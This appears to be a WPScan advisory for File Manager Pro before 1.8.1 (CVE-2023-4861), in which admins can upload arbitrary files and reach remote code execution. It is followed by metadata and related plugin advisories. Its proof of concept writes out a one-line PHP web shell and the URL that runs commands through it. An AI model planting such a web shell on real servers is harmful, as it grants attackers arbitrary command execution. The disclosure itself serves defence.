File Manager Pro < 1.8.1 – Admin+ Remote Code Execution | CVE 2023-4861 | Plugin Vulnerabilities

Description

The plugin allows admin users to upload arbitrary files, even in environments where such a user should not be able to gain full control of the server, such as a multisite installation. This leads to remote code execution.

Proof of Concept

As an admin, use the File Manager UI to upload a file `shell.php` with the following contents:

<?php echo system($_GET['cmd']);

Visit `/shell.php?cmd=id` to trigger RCE.

Affects Plugins

Fixed in 1.8.1

References

CVE

Classification

Type

RCE

OWASP top 10

CWE

CVSS

Miscellaneous

Original Researcher

Alex Sanford

Submitter

Alex Sanford

Submitter website

https://wpscan.com

Verified

Yes

WPVDB ID

7fa03f00-25c7-4e40-8592-bb4001ce019d

Timeline

Publicly Published

2023-09-19 (about 2 years ago)

Added

2023-09-19 (about 2 years ago)

Last Updated

2023-09-19 (about 2 years ago)

Other

Published

Title

Published

2021-02-23

Title

YITH WooCommerce Gift Cards Premium < 3.3.1 - RCE via Arbitrary File Upload

Published

2019-06-11

Title

Insert or Embed Articulate Content into WordPress < 4.2999 - Unauthenticated RCE

Published

2025-10-21

Title

Stockie Extra < 1.2.12 - Unauthenticated Arbitrary Shortcode Execution

Published

2023-12-05

Title

Astra Pro < 4.3.2 - Authenticated(Contributor+) Remote Code Execution via Metabox

Published

2021-12-05

Title

WP Coder < 2.5.2 - RFI leading to RCE via CSRF